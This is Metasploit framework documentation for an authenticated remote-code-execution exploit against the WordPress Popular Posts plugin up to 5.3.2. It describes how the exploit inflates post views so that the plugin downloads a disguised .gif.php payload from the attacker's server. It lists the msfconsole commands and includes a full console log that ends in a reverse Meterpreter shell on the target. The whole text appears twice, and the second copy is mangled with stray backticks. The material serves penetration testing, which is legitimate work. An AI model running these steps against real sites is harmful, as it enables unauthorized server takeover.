documentation/modules/exploit/multi/http/wp_popular_posts_rce.md

## Vulnerable Application

This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2.
The exploit chain is rather complicated.

Authentication is required and `gd` for PHP is required on the server.
Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget.
A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once
the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded
which triggers the plugin to download the payload from our server.  Our payload has a `GIF` header, and a
double extension (`.gif.php`) allowing for arbitrary PHP code to be executed.

### Requirements

#### Server

* `gd` must be installed
* Must have a Popular Posts widget installed on the homepage

#### Client

* Authentication is required
* Authorization to create a post
* FQDN which does NOT resolve to a reserved address (192/172/10)
* Port 80/443/8080 must be open
* The ability to receive a `GET` and `HEAD` request

## Verification Steps

1. Install the plugin to wordpress
1. Start msfconsole
1. Do: `use exploits/multi/http/wp_popular_posts_rce`
1. Do: `set rhosts`
1. Do: `set username`
1. Do: `set password`
1. Do: `set SRVHOSTNAME`
1. Do: `set SRVPORT`
1. Do: `run`
1. You should get a shell.

## Options

### USERNAME

Username of the account which has post privileges. Defaults to `admin`.

### PASSWORD

Password of the account which has post privileges. Defaults to `admin`

### SRVHOSTNAME

FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172).
[Ref](https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560)

### SRVPORT

The local port to listen on. Must be `80`,`443`, or `8080`.
[Ref](https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584)

## Scenarios

### Wordpress Popular Posts 5.3.2 on Wordpress 5.4.8 running on Ubuntu 20.04

```
[*] Processing popular.rb for ERB directives.
resource (popular.rb)> use exploits/multi/http/wp_popular_posts_rce
[*] Using configured payload php/meterpreter/reverse_tcp
resource (popular.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (popular.rb)> set username admin
username => admin
resource (popular.rb)> set password admin
password => admin
resource (popular.rb)> set verbose true
verbose => true
resource (popular.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (popular.rb)> set SRVHOST 1.1.1.1
SRVHOST => 1.1.1.1
resource (popular.rb)> set SRVPORT 8080
SRVPORT => 8080
resource (popular.rb)> set ReverseAllowProxy true
ReverseAllowProxy => true
resource (popular.rb)> set SRVHOSTNAME test.metasploit.com
SRVHOSTNAME => test.metasploit.com
resource (popular.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/wordpress-popular-posts/readme.txt
[*] Found version 5.3.2 in the plugin
[+] The target appears to be vulnerable.
[*] Payload file name: 33pdOF.gif.php
[*] Checking if gd is installed
[*] Determining post with most views
[*] Top Views: 25
[*] Retrieving wpp_admin token
[*] wpp_admin_token: 77de9f26d8
[*] Updating popular posts settings for images
[*] Clearing image cache
[*] Creating new post
[*] ajax nonce: 62666b5377
[*] wp nonce: 6ec79a728b
[*] Created Post: 257
[*] Writing content to Post: 257
[*] Starting web server to handle request for image payload
[*] Using URL: http://1.1.1.1:8080/33pdOF.gif.php
[*] Adding malicious metadata for redirect to http://test.metasploit.com:8080/33pdOF.gif.php
[*] Sending 30 views to http://2.2.2.2/index.php/2021/12/06/mvihjvanh2eyo2n6b43wjxj16/
[*] Waiting 90sec for cache refresh by server
[*] Attempting to force loading of shell by visiting to homepage and loading the widget
[+] Responding to initial HEAD request (passed check 1)
[+] Responding to GET request (passed check 2)
[*] Triggering shell at: /wp-content/uploads/wordpress-popular-posts/257_33pdOF.gif.php in 10 seconds. Attempt 1 of 5
[*] Sending stage (39282 bytes) to 2.2.2.2
[+] Deleted 257_33pdOF.gif.php
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:38664 ) at 2021-12-05 19:05:57 -0500
[*] Server stopped.

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : wordpress2004
OS          : Linux wordpress2004 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
Meterpreter : php/linux
```
wp_popular_posts_rce 2021-12-08 16:45:19 -05:00			`## Vulnerable Application`

			`This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2.`
			`The exploit chain is rather complicated.`

			Authentication is required and `gd` for PHP is required on the server.
			`Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget.`
			`A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once`
			`the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded`
			which triggers the plugin to download the payload from our server. Our payload has a `GIF` header, and a
			double extension (`.gif.php`) allowing for arbitrary PHP code to be executed.

			`### Requirements`

			`#### Server`

			* `gd` must be installed
			`* Must have a Popular Posts widget installed on the homepage`

			`#### Client`

			`* Authentication is required`
			`* Authorization to create a post`
			`* FQDN which does NOT resolve to a reserved address (192/172/10)`
			`* Port 80/443/8080 must be open`
			* The ability to receive a `GET` and `HEAD` request

			`## Verification Steps`

			`1. Install the plugin to wordpress`
			`1. Start msfconsole`
			1. Do: `use exploits/multi/http/wp_popular_posts_rce`
			1. Do: `set rhosts`
			1. Do: `set username`
			1. Do: `set password`
			1. Do: `set SRVHOSTNAME`
			1. Do: `set SRVPORT`
			1. Do: `run`
			`1. You should get a shell.`

			`## Options`

			`### USERNAME`

			Username of the account which has post privileges. Defaults to `admin`.

			`### PASSWORD`

			Password of the account which has post privileges. Defaults to `admin`

			`### SRVHOSTNAME`

			`FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172).`
			`[Ref](https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560)`

			`### SRVPORT`

			The local port to listen on. Must be `80`,`443`, or `8080`.
			`[Ref](https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584)`

			`## Scenarios`

			`### Wordpress Popular Posts 5.3.2 on Wordpress 5.4.8 running on Ubuntu 20.04`

			```
			`[*] Processing popular.rb for ERB directives.`
			`resource (popular.rb)> use exploits/multi/http/wp_popular_posts_rce`
			`[*] Using configured payload php/meterpreter/reverse_tcp`
			`resource (popular.rb)> set rhosts 2.2.2.2`
			`rhosts => 2.2.2.2`
			`resource (popular.rb)> set username admin`
			`username => admin`
			`resource (popular.rb)> set password admin`
			`password => admin`
			`resource (popular.rb)> set verbose true`
			`verbose => true`
			`resource (popular.rb)> set lhost 1.1.1.1`
			`lhost => 1.1.1.1`
			`resource (popular.rb)> set SRVHOST 1.1.1.1`
			`SRVHOST => 1.1.1.1`
			`resource (popular.rb)> set SRVPORT 8080`
			`SRVPORT => 8080`
			`resource (popular.rb)> set ReverseAllowProxy true`
			`ReverseAllowProxy => true`
			`resource (popular.rb)> set SRVHOSTNAME test.metasploit.com`
			`SRVHOSTNAME => test.metasploit.com`
			`resource (popular.rb)> run`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[*] Checking /wp-content/plugins/wordpress-popular-posts/readme.txt`
			`[*] Found version 5.3.2 in the plugin`
			`[+] The target appears to be vulnerable.`
			`[*] Payload file name: 33pdOF.gif.php`
			`[*] Checking if gd is installed`
			`[*] Determining post with most views`
			`[*] Top Views: 25`
			`[*] Retrieving wpp_admin token`
			`[*] wpp_admin_token: 77de9f26d8`
			`[*] Updating popular posts settings for images`
			`[*] Clearing image cache`
			`[*] Creating new post`
			`[*] ajax nonce: 62666b5377`
			`[*] wp nonce: 6ec79a728b`
			`[*] Created Post: 257`
			`[*] Writing content to Post: 257`
			`[*] Starting web server to handle request for image payload`
			`[*] Using URL: http://1.1.1.1:8080/33pdOF.gif.php`
			`[*] Adding malicious metadata for redirect to http://test.metasploit.com:8080/33pdOF.gif.php`
			`[*] Sending 30 views to http://2.2.2.2/index.php/2021/12/06/mvihjvanh2eyo2n6b43wjxj16/`
			`[*] Waiting 90sec for cache refresh by server`
			`[*] Attempting to force loading of shell by visiting to homepage and loading the widget`
			`[+] Responding to initial HEAD request (passed check 1)`
			`[+] Responding to GET request (passed check 2)`
			`[*] Triggering shell at: /wp-content/uploads/wordpress-popular-posts/257_33pdOF.gif.php in 10 seconds. Attempt 1 of 5`
			`[*] Sending stage (39282 bytes) to 2.2.2.2`
			`[+] Deleted 257_33pdOF.gif.php`
			`[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:38664 ) at 2021-12-05 19:05:57 -0500`
			`[*] Server stopped.`

			`meterpreter > getuid`
			`Server username: www-data`
			`meterpreter > sysinfo`
			`Computer : wordpress2004`
			`OS : Linux wordpress2004 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64`
			`Meterpreter : php/linux`
			```